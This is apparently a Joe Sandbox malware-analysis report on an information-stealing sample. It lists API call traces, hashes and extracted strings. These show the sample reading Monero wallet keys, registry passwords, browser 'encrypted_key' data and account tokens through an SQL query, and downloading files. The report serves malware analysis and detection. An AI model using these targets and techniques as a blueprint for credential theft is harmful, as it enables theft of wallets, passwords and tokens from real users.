                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: be298c94f833d237147c5ce85efde67777f814504477fa339b9d42632cda8eec
                              • Instruction ID: fb3d01f20dea2da07c677fee815602443e987bffa6ca4497cf6642e3eacdb519
                              • Opcode Fuzzy Hash: be298c94f833d237147c5ce85efde67777f814504477fa339b9d42632cda8eec
                              • Instruction Fuzzy Hash: C651FB309501489BEB18FF60C992FED7779EF90309F514018F80A6A5A2EF346B46CB62
                              Function 009412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 952d96ea43c9f49033cb802b94dddbc481b8d5d7c50ee60f6902798e8aaf745a
                              • Instruction ID: 0fc91252a703bb34391687ca08ea2e873492b716bbd97822d2d0677c06497b17
                              • Opcode Fuzzy Hash: 952d96ea43c9f49033cb802b94dddbc481b8d5d7c50ee60f6902798e8aaf745a
                              • Instruction Fuzzy Hash: 5DC173B59402199BCB14EF60DC89FEE7379BB94304F004598F50AA7281EE74AA85CF91
                              Function 00944280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009442EC
                              • lstrcat.KERNEL32(?,010FDE88), ref: 0094430B
                              • lstrcat.KERNEL32(?,?), ref: 0094431F
                              • lstrcat.KERNEL32(?,010FCDB8), ref: 00944333
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                • Part of subcall function 00939CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 009493C0: GlobalAlloc.KERNEL32(00000000,009443DD,009443DD), ref: 009493D3
                              • StrStrA.SHLWAPI(?,010FDDC8), ref: 009443F3
                              • GlobalFree.KERNEL32(?), ref: 00944512
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 009444A3
                              • StrCmpCA.SHLWAPI(?,009508D1), ref: 009444C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009444D2
                              • lstrcat.KERNEL32(00000000,?), ref: 009444E5
                              • lstrcat.KERNEL32(00000000,00950FB8), ref: 009444F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 2ea43394b36bb1df6742fe693ee49e928abf444dd662ebd77e3b163bcba05069
                              • Instruction ID: 2f21cc7a1483dfff5fc54ba8897c88a74d38d6e636eaffbccdb7632a5dda490f
                              • Opcode Fuzzy Hash: 2ea43394b36bb1df6742fe693ee49e928abf444dd662ebd77e3b163bcba05069
                              • Instruction Fuzzy Hash: D57115B6D10208ABDB14EBA0DC85FEE7379ABC8304F044598F61997181EE75DB45CF92
                              Function 00931310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                • Part of subcall function 009312A0: RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                • Part of subcall function 009312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                • Part of subcall function 009312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                • Part of subcall function 009312A0: RegCloseKey.ADVAPI32(?), ref: 009312FF
                              • lstrcat.KERNEL32(?,00000000), ref: 0093134F
                              • lstrlen.KERNEL32(?), ref: 0093135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00931377
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00931465
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 009314EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 57e141289a13684a2b56587d91fefe5f3ede4f2456503dc0db95326e1b269938
                              • Instruction ID: abd5d21e75ce17a531c5bc4423dc8a8d6614c05a966222d69f0de9fa53707bd4
                              • Opcode Fuzzy Hash: 57e141289a13684a2b56587d91fefe5f3ede4f2456503dc0db95326e1b269938
                              • Instruction Fuzzy Hash: 7F5154B1D501195BDB15FB60DD92FED733CEF94304F404198B60AA2092EE306B89CFA6
                              Function 009375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                                • Part of subcall function 009372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                                • Part of subcall function 009372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                                • Part of subcall function 009372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                                • Part of subcall function 009372D0: HeapFree.KERNEL32(00000000), ref: 00937459
                              • lstrcat.KERNEL32(00000000,009517FC), ref: 00937606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00937648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0093765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0093768F
                              • lstrcat.KERNEL32(00000000,00951804), ref: 009376A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009376D3
                              • lstrcat.KERNEL32(00000000,00951808), ref: 009376ED
                              • task.LIBCPMTD ref: 009376FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                              • Instruction ID: 5ec647a6c582a957a27727c0308984f9cfbf438bdb31aee4b8468788b4cf05a7
                              • Opcode Fuzzy Hash: ed170c1031a59bae4a2eb34b40e164c2fdf83f6d28d7e07f4eb24ff70bba11c9
                              • Instruction Fuzzy Hash: EA3169B1900209DBCB48EBE4DC96EEFB378ABC5706F104408F116A7290DE34A986CF52
                              Function 009360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                              • InternetOpenA.WININET(00950DF7,00000001,00000000,00000000,00000000), ref: 0093610F
                              • StrCmpCA.SHLWAPI(?,010FE238), ref: 00936147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0093618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009361B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009361DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0093620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00936249
                              • InternetCloseHandle.WININET(?), ref: 00936253
                              • InternetCloseHandle.WININET(00000000), ref: 00936260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                              • Instruction ID: 18b475e5c52ce719fc412b8c57782533c74d9b380f2c3a393bfd4b5e98a97139
                              • Opcode Fuzzy Hash: 54bcc6a3f8ecb9d6a785a61451ad29bb9950dc2cf6f50c11704cd22a97bc5c1e
                              • Instruction Fuzzy Hash: EB5150B1940218ABEB24DF90DC45FEE77B8EB84705F108498F609A71C1DB74AE85CFA5
                              Function 009372D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0093733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009373B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0093740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00937452
                              • HeapFree.KERNEL32(00000000), ref: 00937459
                              • task.LIBCPMTD ref: 00937555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                              • Instruction ID: a01cd4bbdf2d3ec8be69b8b4c95613b8877e3545dbc0857546d4a99ea5c42c47
                              • Opcode Fuzzy Hash: 32ad7f72715e59e818b80398ae87e487bad465dd21286e6336c311c69a937729
                              • Instruction Fuzzy Hash: C4610CB590425C9BDB24DB50DD45BDAB7B8BF84304F0081E9E689A6141DF706FC9CF91
                              Function 0093BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0093BC9F
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0093BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0093BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0093BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                              • Instruction ID: 7e6bbebbf11fc6a4978f26e091f0356ef821848f9cd5d54b31cf230e4888db14
                              • Opcode Fuzzy Hash: 47c537cd11da3c7be5e30773c91bfa169fb18e9d6fec4310d3888bf62f1b9ffd
                              • Instruction Fuzzy Hash: 49B14F72950108ABEB14FBA0DC96FEE7339EF94304F404558F506A7191EF346E49CBA6
                              Function 00946770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                              • Instruction ID: 6cea885e9e9763fa506887a533aa9cc9f5c447493edcbe045ce7fb046804b304
                              • Opcode Fuzzy Hash: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                              • Instruction Fuzzy Hash: E6F05E70908209EFD3889FE0E909B2C7B74FB45703F040198E60D87290DA745F829B97
